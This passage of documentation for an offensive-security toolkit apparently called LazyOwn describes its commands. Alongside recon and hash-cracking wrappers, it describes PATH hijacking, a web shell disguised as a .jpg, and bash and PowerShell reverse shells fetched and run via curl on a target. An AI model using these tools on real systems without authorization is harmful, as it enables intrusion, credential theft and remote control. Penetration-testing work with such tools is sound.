  3. Sets executable permissions on the copied script.
  4. Prepends /tmp to the system’s PATH environment variable to ensure the script is executed in preference to other binaries.

The function then prints out each command being executed and a message indicating the binary name used for the path hijacking.

:param binary_name: The name of the binary to be used in the path hijacking attack. :returns: None


Run a script with the given arguments

This method constructs and executes a command to run a Python script with the specified arguments. It uses the run_command method to execute the script and handle real-time output.

:param script_name: The name of the script to be executed. :type script_name: str :param args: The arguments to be passed to the script. :type args: tuple of str

:returns: None

Manual execution: 1. Build the command list with “python3”, the script name, and the arguments. 2. Call run_command with the constructed command list.

Dependencies: - run_command method for executing the constructed command and streaming output.

Example: To execute a script named example.py with arguments arg1 and arg2, call: run_script("example.py", "arg1", "arg2")

Note: - The script_name parameter should be a string representing the name of the script. - The args parameter is a variable-length argument list containing the arguments to be passed to the script. - Ensure that the script and arguments are properly specified.


Run a command and print output in real-time

This method executes a given command using subprocess.Popen and streams both the standard output and standard error to the console in real-time. The output from both streams is appended to the self.output attribute. If interrupted, the process is terminated gracefully.

:param command: The command to be executed. :type command: str

:returns: None

Manual execution: 1. Execute the command specified by the command parameter. 2. Stream and print the command’s standard output and error to the console in real-time. 3. Append all output to the self.output attribute. 4. Handle KeyboardInterrupt by terminating the process and printing an error message.

Dependencies: - subprocess module for running the command and capturing output. - print_msg function for printing output to the console. - print_error function for printing error messages to the console.

Example: To execute a command, call run_command("ls -l").

Note: - The command parameter should be a string representing the command to be executed. - self.output must be initialized before calling this method. - Ensure proper exception handling to manage process interruptions.


Load parameters from a specified payload JSON file.

This function loads parameters from a JSON file specified by the line argument and updates the instance’s params dictionary with the values from the file. If the file does not exist or contains invalid JSON, it will print an appropriate error message.

Usage: payload

:param line: The name of the JSON file to load. :type line: str

:returns: None

Manual execution: 1. Open and read the specified JSON file. 2. Update the params dictionary with values from the JSON file. 3. Print a success message if the parameters were successfully loaded. 4. Handle FileNotFoundError if the file does not exist. 5. Handle JSONDecodeError if there is an error decoding the JSON file.

Dependencies: - json module for reading and parsing the JSON file.

Example: To execute the function, call payload payload_10.10.10.10.json.

Note: - Ensure that the specified JSON file exists in the current directory and is properly formatted. - The confirmation message includes color formatting for better visibility.


Exit the command line interface.

This function prompts the user to confirm whether they want to exit the command line interface. If confirmed, it will terminate the program. Otherwise, it will cancel the exit.

Usage: exit

:param arg: This parameter is not used in this function. :type arg: str

:returns: None

Manual execution: 1. Prompt the user with a confirmation message to exit the CLI. 2. If the user confirms with ‘s’, print a message and exit the program. 3. If the user provides any other input, print a cancellation message and remain in the CLI.

Dependencies: - sys.exit function for exiting the program.

Example: To execute the function, simply call exit.

Note: - The confirmation prompt is in Spanish. - Ensure that sys is imported in your script.


Fix permissions for LazyOwn shell scripts.

This function adjusts the file permissions for shell scripts and CGI scripts in the modules directory, making them executable.

Usage: fixperm

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Change the permissions of all shell scripts in the modules directory to be executable. 2. Change the permissions of all files in the modules/cgi-bin directory to be executable.

Dependencies: - chmod command must be available on the system.

Example: To execute the function, simply call fixperm.

Note: - Ensure you have the necessary permissions to modify file permissions.


Run LazyOwn webshell server.

This function starts a web server that serves the lazywebshell.py script from the modules directory on port 8888. The server is run in the background.

Usage: lazywebshell

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Start a Python HTTP server with CGI support on port 8888. 2. The server serves files from the modules directory.

Dependencies: - Python 3.x must be installed on the system. - The http.server module should be available.

Example: To execute the function, simply call lazywebshell.

Note: - The server runs in the background, and the output will not be displayed in the terminal.


Retrieve and display file capabilities on the system.

This function uses the getcap command to recursively list capabilities for files starting from the root directory (/). The output is filtered to suppress error messages.

Usage: getcap

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Run the getcap -r / command to list file capabilities recursively from the root directory. 2. Redirect standard error to /dev/null to suppress error messages. 3. Copy to clipboard the command to appy in the victim machine. Dependencies: - getcap must be installed on the system.

Example: To execute the function, simply call do_getcap.

Note: - The command may require elevated permissions to access certain directories and files.


Get the SecLists wordlist from GitHub.

This function downloads and extracts the SecLists wordlist from GitHub to the /usr/share/wordlists/ directory.

Usage: getseclist

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Navigate to the /usr/share/wordlists/ directory. 2. Download the SecLists repository using wget. 3. Extract the downloaded ZIP file. 4. Remove the ZIP file after extraction.

Dependencies: - wget must be installed on the system. - unzip must be installed on the system. - sudo must be available for downloading and extracting files.

Example: To execute the function, simply call getseclist.

Note: - Ensure that you have the necessary permissions to write to the /usr/share/wordlists/ directory. - If wget or unzip is not installed, the function will fail.


Interacts with SMB shares using the smbclient command to perform the following operations:

  1. Checks if rhost (remote host) and lhost (local host) are set; if not, an error message is displayed.
  2. If line (share name) is provided:
  1. If line is not provided:
  1. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/share" /mnt/smb

:param line: The name of the SMB share to access on the remote host. If not provided, the function will list all available shares. :returns: None


smbmap -H [OPTIONS] Uses the smbmap tool to interact with SMB shares on a remote host:

  1. Checks if rhost (remote host) and lhost (local host) are set; if not, an error message is displayed.
  2. If no line (share name or options) is provided:
  1. If line is provided:
  1. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/documents" /mnt/smb

:param line: Options or share name to use with smbmap. If not provided, uses a default user to list shares. :returns: None


sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt Executes the impacket-GetNPUsers command to enumerate users with Kerberos pre-authentication disabled.

  1. Checks if the line (domain) argument is provided; if not, an error message is displayed, instructing the user to provide a domain.
  2. Executes impacket-GetNPUsers with the following options:

:param line: The domain to query. Must be provided in the format domain.com. Example usage: getnpusers domain.com :returns: None

Manual execution: To manually run this command, use the following syntax: sudo impacket-GetNPUsers -no-pass -usersfile sessions/users.txt Replace <domain> with the actual domain name you want to query.


Copies the rhost IP address to the clipboard and updates the prompt with the IP address.

  1. Retrieves the rhost IP address from the self.params parameter.
  2. Checks if the rhost is valid using check_rhost(). If invalid, the function returns without making changes.
  3. If line is ‘clean’, resets the custom prompt to its original state.
  4. Otherwise, updates the prompt to include the rhost IP address in the specified format.
  5. Copies the rhost IP address to the clipboard using xclip.
  6. Prints a message confirming that the IP address has been copied to the clipboard.

:param line: This parameter determines whether the prompt should be reset or updated with the IP address. :type line: str :returns: None

Manual execution: To manually run this command, use the following syntax: rhost Replace <line> with ‘clean’ to reset the prompt, or any other string to update the prompt with the IP address.


Executes the rpcdump.py script to dump RPC services from a target host.

  1. Retrieves the target host IP from the rhost parameter.
  2. Checks if the rhost parameter is valid using check_rhost(). If invalid, the function returns early.
  3. Executes the rpcdump.py script on port 135 and 593 to gather RPC service information from the target host.

:param line: This parameter is not used in this command but is included for consistency with other methods. :returns: None

Manual execution: To manually run this command, use the following syntax: rpcdump.py -p 135 rpcdump.py -p 593 Replace <target_host> with the IP address or hostname of the target machine.


Executes the dig command to query DNS information.

  1. Retrieves the DNS server IP from the line parameter and the target host from the rhost parameter.
  2. If either the DNS server or rhost is not provided, an error message is printed.
  3. Executes the dig command to query the version of the DNS server and additional records.

:param line: DNS server IP or hostname. Must be provided for the dig command. :param rhost: Target host for additional dig queries.

:returns: None

Manual execution: To manually run these commands, use the following syntax: dig version.bind CHAOS TXT @ dig any @

Replace <dns_server> with the IP address or hostname of the DNS server, <domain> with the target domain, and <rhost> with the IP address or hostname of the target machine.


Copies a file from the ExploitDB directory to the sessions directory.

  1. Retrieves the path to the ExploitDB directory and the target file from the line parameter.
  2. Copies the specified file from the ExploitDB directory to the sessions directory in the current working directory.

:param line: The relative path to the file within the ExploitDB directory. For example, java/remote/51884.py. :param exploitdb: The path to the ExploitDB directory. This must be set in advance or provided directly.

:returns: None

Manual execution: To manually copy files, use the following syntax: cp

Replace <exploitdb_path> with the path to your ExploitDB directory, <file_path> with the relative path to the file, and <destination_path> with the path where you want to copy the file.

For example: cp /usr/share/exploitdb/exploits/java/remote/51884.py /path/to/sessions/


Performs DNS enumeration using dnsenum to identify subdomains for a given domain.

  1. Executes the dnsenum command with parameters to specify the DNS server, output file, and wordlist for enumeration.

:param line: The target domain to perform DNS enumeration on, e.g., ghost.htb. :param rhost: The DNS server to use for enumeration, e.g., :param dnswordlist: The path to the DNS wordlist file used for subdomain discovery.

:returns: None

Manual execution: To manually perform DNS enumeration, use the following command: dnsenum –dnsserver –enum -p 0 -s 0 -o -f

Replace <dns_server> with the DNS server IP, <output_file> with the file path to save the results, <dns_wordlist> with the path to your DNS wordlist file, and <target_domain> with the domain to be enumerated.

For example: dnsenum –dnsserver –enum -p 0 -s 0 -o sessions/subdomains.txt -f /path/to/dnswordlist.txt ghost.htb


Performs DNS enumeration using dnsmap to discover subdomains for a specified domain.

  1. Executes the dnsmap command to scan the given domain with a specified wordlist.

:param line: The target domain to perform DNS enumeration on, e.g., ghost.htb. :param dnswordlist: The path to the wordlist file used for DNS enumeration.

:returns: None

Manual execution: To manually perform DNS enumeration, use the following command: dnsmap -w

Replace <target_domain> with the domain you want to scan and <dns_wordlist> with the path to your DNS wordlist file.

For example: dnsmap ghost.htb -w /path/to/dnswordlist.txt


Performs a web technology fingerprinting scan using whatweb.

  1. Executes the whatweb command to identify technologies used by the target web application.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target web host to be scanned, specified in the params dictionary.

:returns: None

Manual execution: To manually perform web technology fingerprinting, use the following command: whatweb

Replace <target_host> with the URL or IP address of the web application you want to scan.

For example: whatweb example.com


Performs enumeration of information from a target Linux/Unix system using enum4linux.

  1. Executes the enum4linux command with the -a option to gather extensive information from the specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution: To manually enumerate information from a Linux/Unix system, use the following command: enum4linux -a

Replace <target_host> with the IP address or hostname of the target system.

For example: enum4linux -a


Performs network scanning using nbtscan to discover NetBIOS names and addresses in a specified range.

  1. Executes the nbtscan command with the -r option to scan the specified range of IP addresses for NetBIOS information.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The target network range for scanning, specified in the params dictionary.

:returns: None

Manual execution: To manually perform a NetBIOS scan across a network range, use the following command: sudo nbtscan -r

Replace <network_range> with the IP address range you want to scan. For example: sudo nbtscan -r


Executes the rpcclient command to interact with a remote Windows system over RPC (Remote Procedure Call) using anonymous credentials.

  1. Runs rpcclient with the -U '' (empty username) and -N (no password) options to connect to the target host specified by rhost.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The IP address of the remote host to connect to, specified in the params dictionary.

:returns: None

Manual execution: To manually interact with a remote Windows system using RPC, use the following command: rpcclient -U ’’ -N

Replace <target_ip> with the IP address of the target system. For example: rpcclient -U ’’ -N


Runs the nikto tool to perform a web server vulnerability scan against the specified target host.

  1. Executes nikto with the -h option to specify the target host IP address.
  2. Installs nikto if it is not already installed.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The IP address of the target web server, specified in the params dictionary.

:returns: None

Manual execution: To manually perform a web server vulnerability scan using nikto, use the following command: nikto -h

Replace <target_ip> with the IP address of the target web server. For example: nikto -h


Runs the finalrecon tool to perform a web server vulnerability scan against the specified target host.

  1. Executes finalrecon with the -h option to specify the target host IP address.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The IP address of the target web server, specified in the params dictionary.

:returns: None

Manual execution: To manually perform a web server vulnerability scan using finalrecon, use the following command: finalrecon –url=http:// –full -o txt -cd

Replace <target_ip> with the IP address of the target web server. For example: finalrecon –url= –full -o txt -cd /home/gris/finalrecon


Uses openssl s_client to connect to a specified host and port, allowing for testing and debugging of SSL/TLS connections.

:param line: The port number to connect to on the target host. This must be provided as an argument. :param rhost: The IP address or hostname of the target server, specified in the params dictionary.

:returns: None

Manual execution: To manually connect to a server using openssl s_client and test SSL/TLS, use the following command: openssl s_client -connect :

Replace <target_ip> with the IP address or hostname of the target server and <port> with the port number. For example: openssl s_client -connect


Uses searchsploit to search for exploits in the Exploit Database based on the provided search term.

:param line: The search term or query to find relevant exploits. This must be provided as an argument.

:returns: None

Manual execution: To manually search for exploits using searchsploit, use the following command: searchsploit

Replace <search_term> with the term or keyword you want to search for. For example: searchsploit kernel


Uses wfuzz to perform fuzzing based on provided parameters. This function supports various options for directory and file fuzzing.

:param line: The options and arguments for wfuzz. The line parameter can include the following: - sub <domain>: Fuzz DNS subdomains. Requires dnswordlist to be set. - iis: Fuzz IIS directories. Uses a default wordlist if iiswordlist is not set. - Any other argument: General directory and file fuzzing.

:returns: None

Manual execution: To manually use wfuzz for directory and file fuzzing, use the following commands:

  1. For fuzzing DNS subdomains: wfuzz -c -t -w -H ‘Host: FUZZ.

Example: wfuzz -c –hl=7 -t 200 -w /path/to/dnswordlist -H ‘Host: FUZZ.example.com’ example.com

  1. For fuzzing IIS directories: wfuzz -c -t -w /path/to/iiswordlist http:///FUZZ

Example: wfuzz -c –hl=7 -t 200 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/IIS.fuzz.txt

  1. For general directory and file fuzzing: wfuzz -c -t -w http:///FUZZ

Example: wfuzz -c –hl=7 -t 200 -w /path/to/dirwordlist


Searches for packages on Launchpad based on the provided search term and extracts codenames from the results. The distribution is extracted from the search term.

:param line: The search term to be used for querying Launchpad. The line parameter should be a string containing the search term, e.g., “8.2p1 Ubuntu 4ubuntu0.11”.

:returns: None

Manual execution: To manually execute the equivalent command, use the following steps:

  1. Extract the distribution from the search term:
  1. URL encode the search term:
  1. Use curl to perform the search and filter results: curl -s “https://launchpad.net/+search?field.text=” | grep ‘href’ | grep ‘’ | grep -oP ‘(?<=href=“https://launchpad.net//)[^/"]+’ | sort -u

Example: If the search term is “8.2p1 Ubuntu 4ubuntu0.11”, the command would be: curl -s “https://launchpad.net/+search?field.text=8.2p1%20Ubuntu%204ubuntu0.11” | grep ‘href’ | grep ‘ubuntu’ | grep -oP ‘(?<=href=“https://launchpad.net/ubuntu/)[^/"]+’ | sort -u

Notes: - Ensure that curl is installed and accessible in your environment. - The extracted codenames are printed to the console.


Uses gobuster for directory and virtual host fuzzing based on provided parameters. Supports directory enumeration and virtual host discovery.

:param line: The options and arguments for gobuster. The line parameter can include the following: - url: Perform directory fuzzing on a specified URL. Requires url and dirwordlist to be set. - vhost: Perform virtual host discovery on a specified URL. Requires url and dirwordlist to be set. - Any other argument: General directory fuzzing with additional parameters.

:returns: None

Manual execution: To manually use gobuster, use the following commands:

  1. For directory fuzzing: gobuster dir –url / –wordlist

Example: gobuster dir –url http://example.com/ –wordlist /path/to/dirwordlist

  1. For virtual host discovery: gobuster vhost –append-domain -u -w –random-agent -t 600

Example: gobuster vhost –append-domain -u http://example.com -w /path/to/dirwordlist –random-agent -t 600

  1. For general directory fuzzing with additional parameters: gobuster dir –url http:/// –wordlist

Example: gobuster dir –url –wordlist /path/to/dirwordlist -x .php,.html


Adds an entry to the /etc/hosts file, mapping an IP address to a domain name.

:param line: The domain name to be added to the /etc/hosts file. - Example: permx.htb

:returns: None

Manual execution: To manually add a domain to the /etc/hosts file, use the following command:

sudo sh -c -e "echo '<rhost> <domain>' >> /etc/hosts"

Example: sudo sh -c -e “echo ‘ permx.htb’ >> /etc/hosts”

This command appends the IP address and domain name to the /etc/hosts file, enabling local resolution of the domain.


Performs an SMB enumeration using crackmapexec.

:param line: Not used in this function.

:returns: None

Manual execution: To manually run crackmapexec for SMB enumeration, use the following command:

crackmapexec smb <target>

Example: crackmapexec smb

This command will enumerate SMB shares and perform basic SMB checks against the specified target IP address.


Dumps LDAP information using ldapdomaindump with credentials from a file.

:param line: The domain to use for authentication (e.g., ‘domain.local’).

:returns: None

Manual execution: To manually run ldapdomaindump for LDAP enumeration, use the following command:

ldapdomaindump -u '<domain>\<username>' -p '<password>' <target>

Example: ldapdomaindump -u ‘domain.local’ -p ‘passadmin123’

Ensure you have a file sessions/credentials.txt in the format user:password, where each line contains credentials for the LDAP enumeration.


Perform LDAP enumeration using bloodhound-python with credentials from a file.

:param line: This parameter is not used in the function but could be used for additional options or domain information.

:returns: None

Manual execution: To manually run bloodhound-python for LDAP enumeration, use the following command:

bloodhound-python -c All -u '<username>' -p '<password>' -ns <target>

Example: bloodhound-python -c All -u ‘usuario’ -p ‘password’ -ns

Ensure you have a file sessions/credentials.txt with the format user:password, where each line contains credentials for enumeration.


Perform a ping to check host availability and infer the operating system based on TTL values.

:param line: This parameter is not used in the function but could be used for additional options or settings.

:returns: None

Manual execution: To manually ping a host and determine its operating system, use the following command:

ping -c 1 <target>

Example: ping -c 1

The TTL (Time To Live) value is used to infer the operating system: - TTL values around 64 typically indicate a Linux system. - TTL values around 128 typically indicate a Windows system.

Ensure you have set rhost to the target host for the command to work.


Try gospider for web spidering.

This function executes the gospider tool to perform web spidering. It can either use a URL provided as a parameter or the remote host defined in self.params.

Usage: gospider url gospider

:param line: Command parameter that determines the execution mode. Use “url” to specify a URL, or leave empty to use the remote host. :type line: str

:returns: None

Manual execution: 1. Ensure that the gospider tool is installed on the system. 2. Set the url parameter if using the “url” mode. 3. Run the method to perform the spidering operation.

Dependencies: - gospider must be installed on the system. - The sudo command must be available for installing gospider.

Examples: 1. To scan a specific URL: gospider url 2. To scan the remote host: gospider

Note: - If gospider is not installed, the method will attempt to install it. - Ensure that the network and tools are configured correctly for successful execution.


Executes an ARP scan using arp-scan.

This function performs an ARP scan on the local network using the arp-scan tool. The network device to be used for scanning must be specified.

Usage: arpscan

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Ensure that the network device is set using the appropriate parameter. 2. Run the method to perform an ARP scan.

Dependencies: - arp-scan must be installed on the system. - The sudo command must be available for executing arp-scan.

Examples: 1. Set the device parameter using set device <network_device>. 2. Run arpscan to perform the ARP scan.

Note: - The network device must be configured and available on the system for the scan to work. - Ensure that arp-scan is installed and accessible from the command line.


Executes the LazyPwn script.

This function runs the lazypwn.py script located in the modules directory. The script is typically used for automated exploitation or security testing tasks within the LazyOwn framework.

Usage: lazypwn

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Run the method to execute the LazyPwn script.

Dependencies: - The lazypwn.py script must be present in the modules directory. - Python 3 must be installed and accessible from the command line.

Examples: 1. Run do_lazypwn to execute the LazyPwn script.

Note: - Ensure that lazypwn.py is configured correctly before running this method. - The script’s functionality depends on its implementation in modules/lazypwn.py.


Fixes file permissions and line endings in the project directories.

This function converts line endings from DOS/Windows format to Unix format for all files in the project directories. This helps to ensure consistent line endings and can prevent issues related to file format mismatches.

Usage: fixel

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Run the method to fix line endings in the specified directories.

Dependencies: - The dos2unix command must be installed and accessible from the command line.

Examples: 1. Run do_fixel to convert line endings for all files in the project directories.

Note: - This method only fixes line endings and does not modify file permissions. - Ensure that the dos2unix command is installed and functioning correctly.


Sets up an SMB server using Impacket and creates an SCF file for SMB share access.

This function configures an SMB server to serve files from the sessions directory and generates an SCF file that points to the SMB share. The SCF file can be used to create a shortcut to the SMB share on a Windows system.

Usage: smbserver

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Ensure lhost is set to a valid IP address or hostname. 2. Run the method to create the SCF file and start the SMB server. 3. Use the copied curl command to download the SCF file on the target system. 4. Ensure that impacket-smbserver is installed and accessible from the command line.

Dependencies: - The impacket-smbserver tool must be installed and accessible from the command line. - The check_lhost function must validate the lhost parameter.

Examples: 1. Run do_smbserver to set up the SMB server and generate the SCF file. 2. Use the provided curl command to download the SCF file on the target system.

Note: - The SCF file is used to create a shortcut to the SMB share and should be accessible from the target system. - Ensure that the lhost parameter is correctly set and that the SMB server is properly configured.


Uses sqlmap to perform SQL injection testing on a given URL or request file (you can get one with burpsuit or proxy command and foxyproxy plugin for browser).

This function allows the execution of sqlmap commands with various options, including testing URL endpoints, reading from request files, and using sqlmap’s wizard mode for easy configuration.

Usage: sqlmap req sqlmap req sqlmap req

sqlmap -wiz

:param line: Command parameters for sqlmap. :type line: str

  • If line starts with req, it expects the following formats:

  • req <request_file> <parameter>: Tests the specified parameter in the request file for SQL injection.

  • req <request_file> <parameter> <database>: Tests the specified parameter and attempts to dump tables from the specified database.

  • req <request_file> <parameter> <database> <table>: Tests the specified parameter and attempts to dump data from the specified table in the database.

  • If line starts with -wiz, it runs sqlmap’s wizard mode for interactive configuration.

  • If line is empty, it uses the URL specified in self.params["url"] to perform SQL injection testing with sqlmap.

:returns: None

Manual execution: 1. If using req, provide a valid request file and parameters. 2. Run sqlmap with the specified options for SQL injection testing. 3. To use the wizard mode, execute sqlmap -wizard. 4. For URL-based testing, ensure url is set and run sqlmap with the URL.

Dependencies: - The sqlmap tool must be installed and accessible from the command line. - The request file specified in req should be located in the sessions directory.

Examples: sqlmap req requests.txt id sqlmap req requests.txt id database_name sqlmap req requests.txt id database_name table_name sqlmap -wiz

Note: - Ensure the request file exists and is readable before running sqlmap. - The URL must be set for URL-based testing. - The wizard mode is useful for interactive configuration if you’re unsure about the options.


Runs a small proxy server to modify HTTP requests on the fly.

This function starts the lazyproxy.py script, which acts as a proxy server for intercepting and modifying HTTP requests. The server listens on port 8888.

Usage: proxy

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Executes the lazyproxy.py script to start the proxy server. 2. The proxy server will run and modify requests as configured in the script.

Dependencies: - The lazyproxy.py script must be available in the modules directory.

Example: proxy

Note: - Ensure that the lazyproxy.py script is correctly configured before running. - The proxy server will be accessible at http://localhost:8888. - To stop the proxy server, terminate the running process manually.


Creates a web shell disguised as a .jpg file in the sessions directory.

This function performs the following actions: 1. Runs a Python script lazycreate_webshell.py to create a disguised web shell. 2. Downloads a PHP web shell from a specified URL and saves it to the sessions directory.

Usage: createwebshell

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Executes the lazycreate_webshell.py script to create a web shell disguised as a .jpg file. 2. Downloads a PHP web shell from the GitHub repository and saves it to sessions.

Dependencies: - wget must be installed for downloading the web shell. - The lazycreate_webshell.py script must be available in the modules directory.

Example: createwebshell

Note: - Ensure that the lazycreate_webshell.py script is correctly configured and accessible. - Verify the URL in the wget command to ensure it points to a valid and safe web shell.


Creates a bash reverse shell script in the sessions directory with the specified lhost and lport values.

This function performs the following actions: 1. Checks if lhost and lport are set. If not, it prints an error message and exits. 2. Creates a bash reverse shell script using the provided lhost and lport values. 3. Saves the script to sessions/revshell.sh. 4. Prints a message with the curl command to download and execute the reverse shell script. 5. Copies the curl command to the clipboard.

Usage: createrevshell

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/revshell.sh with the bash reverse shell script. 2. Displays the command to download and execute the script via curl. 3. Copies the curl command to the clipboard for easy use.

Dependencies: - Bash must be installed on the target system. - xclip must be installed for copying the command to the clipboard.

Example: createrevshell

Note: - Ensure that lhost and lport are set before running this command. - The script will listen for incoming connections on the specified lport and connect back to lhost. - Adjust the lhost and lport as needed for your specific environment.


Creates a PowerShell reverse shell script in the sessions directory with the specified lhost and lport values.

This function performs the following actions: 1. Checks if lhost and lport are set. If not, it prints an error message and exits. 2. Creates a PowerShell reverse shell script using the provided lhost and lport values. 3. Saves the script to sessions/revshell.ps1. 4. Prints a message with the command to download and execute the reverse shell script via curl. 5. Copies the curl command to the clipboard.

Usage: createwinrevshell

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/revshell.ps1 with the PowerShell reverse shell script. 2. Displays the command to download and execute the script via curl. 3. Copies the curl command to the clipboard for easy use.

Dependencies: - PowerShell must be installed on the target system. - xclip must be installed for copying the command to the clipboard.

Example: createwinrevshell

Note: - Ensure that lhost and lport are set before running this command. - The script will listen for incoming connections on the specified lport and connect back to lhost. - Adjust the lhost and lport as needed for your specific environment.


Creates a hash.txt file in the sessions directory with the specified hash value and analyzes it using Name-the-hash.

This function performs the following actions: 1. Writes the provided hash value to sessions/hash.txt. 2. Analyzes the hash value using Name-the-hash.

Usage: createhash

:param line: The hash value to be written to hash.txt and analyzed. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/hash.txt with the specified hash value. 2. Analyzes the hash value using the nth command.

Dependencies: - sessions/hash.txt will be created in the sessions directory. - Name-the-hash must be installed and accessible via the command nth.

Example: createhash 5f4dcc3b5aa765d61d8327deb882cf99

Note: - Ensure the hash value is correct before running the analysis. - The hash value should be provided as a single argument without extra characters or spaces.


Creates a credentials.txt file in the sessions directory with the specified username and password.

This function performs the following actions: 1. Validates the input line to ensure it contains a colon (:), indicating the presence of both a username and password. 2. Writes the valid input to sessions/credentials.txt.

Usage: createcredentials user:password

:param line: The input line containing the username and password in the format user:password. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/credentials.txt with the specified username and password.

Dependencies: - sessions/credentials.txt will be created in the sessions directory.

Example: createcredentials administrator:passwordadministrator123&!

Note: - Ensure the input format is correct: user:password. - The credentials should be properly formatted with a colon separating the username and password.


Creates a cookie.txt file in the sessions directory with the specified cookie value.

This function performs the following actions: 1. Extracts the cookie value from the provided input line using a regular expression. 2. Writes the extracted cookie value to sessions/cookie.txt.

Usage: createcookie cookie=user_data=valor_base64

:param line: The input line containing the cookie value in the format cookie=value. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/cookie.txt with the extracted cookie value.

Dependencies: - sessions/cookie.txt will be created in the sessions directory.

Example: createcookie cookie=user_data=valor_base64

Note: - Ensure the input format is correct: cookie=value. - The cookie value should be properly encoded and formatted as needed.


Downloads resources into the sessions directory.

This function performs the following actions: 1. Changes to the sessions directory and executes download_resources.sh to download required resources.

Usage: download_resources

:param line: Not used in this function. :type line: str :returns: None

Manual execution: 1. Runs the download_resources.sh script in the sessions directory to download necessary resources.

Dependencies: - download_resources.sh must be present in the sessions directory.

Example: download_resources

Note: - Ensure that the download_resources.sh script is present in the sessions directory and is executable. - After running this command, you can use the www command as indicated by the printed message.


Downloads and sets up exploits in the external/.exploits/ directory and starts a web server to serve the files.

This function performs the following actions: 1. Changes to the external directory and executes install_external.sh to install necessary components or exploits. 2. Displays the IP addresses associated with network interfaces and copies the IP address of tun0 to the clipboard. 3. Lists the contents of the external/.exploit directory and starts a web server on port 8443 to serve the files in that directory. 4. Prints a message indicating the server’s status and the port it’s running on.

Usage: download_exploit

:param line: Not used in this function. :type line: str :returns: None

Manual execution: 1. Runs the install_external.sh script to set up necessary components or exploits. 2. Displays network interface IP addresses and copies the IP address of tun0 to the clipboard. 3. Lists the contents of external/.exploit directory. 4. Starts a Python HTTP server on port 8443 in the external/.exploit directory to serve files.

Dependencies: - install_external.sh must be present in the external directory. - xclip must be installed for clipboard operations. - Python 3 must be installed to run the HTTP server.

Example: download_exploit

Note: - Ensure that the install_external.sh script is correctly configured and present in the external directory. - The HTTP server will be accessible on port 8443. - The function assumes the presence of external/.exploit directory and serves files from there.


Runs the dirsearch tool to perform directory and file enumeration on a specified URL.

This function executes dirsearch to scan a given URL for directories and files, while excluding specific HTTP status codes from the results. If dirsearch is not installed, the function will attempt to install it before running the scan.

Usage: dirsearch

:param line: Not used in this function. The URL is provided via the url parameter. :type line: str :returns: None

Manual execution: 1. If dirsearch is present, the command dirsearch -u <url> -x 403,404,400 is executed. 2. If dirsearch is not present, the function installs dirsearch using sudo apt install dirsearch -y and then runs the command.

Dependencies: - dirsearch must be installed. If not present, it will be installed using sudo apt. - Ensure the URL is set via the url parameter before calling this function.

Example: dirsearch http://example.com/

Note: - Ensure that the url parameter is set before calling this function. - The -x option specifies HTTP status codes to exclude from the results (e.g., 403, 404, 400). - The function will attempt to install dirsearch if it is not already installed.


Runs John the Ripper with a specified wordlist and options.

This function executes John the Ripper to crack hashes using the specified wordlist and additional options. If no additional options are provided, it will attempt to display cracked hashes.

Usage: john2hash

:param line: Optional arguments to be passed to John the Ripper (e.g., --format=Raw-SHA512). If not provided, the function will default to showing the cracked hashes. :type line: str :returns: None

Manual execution: 1. If line is provided, the command sudo john sessions/hash.txt --wordlist=<wordlist> <options> is executed. 2. If line is not provided, the command sudo john sessions/hash.txt --wordlist=<wordlist> is executed to display the cracked hashes.

Dependencies: - John the Ripper must be installed and available in the system’s PATH. - Ensure the wordlist file exists at the specified path. - The sessions/hash.txt file must contain the hashes to be cracked.

Example: john2hash –format=Raw-SHA512 # If wordlist is set to /usr/share/wordlists/rockyou.txt, the command executed will be sudo john sessions/hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA512.

Note: - Ensure that the wordlist parameter is set before calling this function. - Provide the necessary options as a string argument (e.g., --format=Raw-SHA512) if needed. - If no options are provided, the function defaults to showing the cracked hashes.


Runs Hashcat with specified attack mode and hash type using a wordlist.

This function executes the Hashcat tool with the specified mode and wordlist file. The hash value to be cracked should be provided as an argument.

Usage: hashcat

:param line: The hash type or mode to be used with Hashcat (e.g., 0 for MD5). This is a required argument. :type line: str :returns: None

Manual execution: 1. The command hashcat -a 0 -m <mode> <hash> <wordlist> is executed, where <mode> is the hash type, <hash> is the hash to be cracked, and <wordlist> is the path to the wordlist file.

Dependencies: - Hashcat must be installed and available in the system’s PATH. - Ensure the wordlist file exists at the specified path.

Example: hashcat 0 # If wordlist is set to /usr/share/wordlists/rockyou.txt and line is 0, the command executed will be hashcat -a 0 -m 0 /usr/share/wordlists/rockyou.txt.

Note: - Ensure that the wordlist parameter is set before calling this function. - The hash to be cracked must be passed as an argument when calling the function. - Replace <mode> with the appropriate Hashcat mode number (e.g., 0 for MD5, 1000 for NTLM).


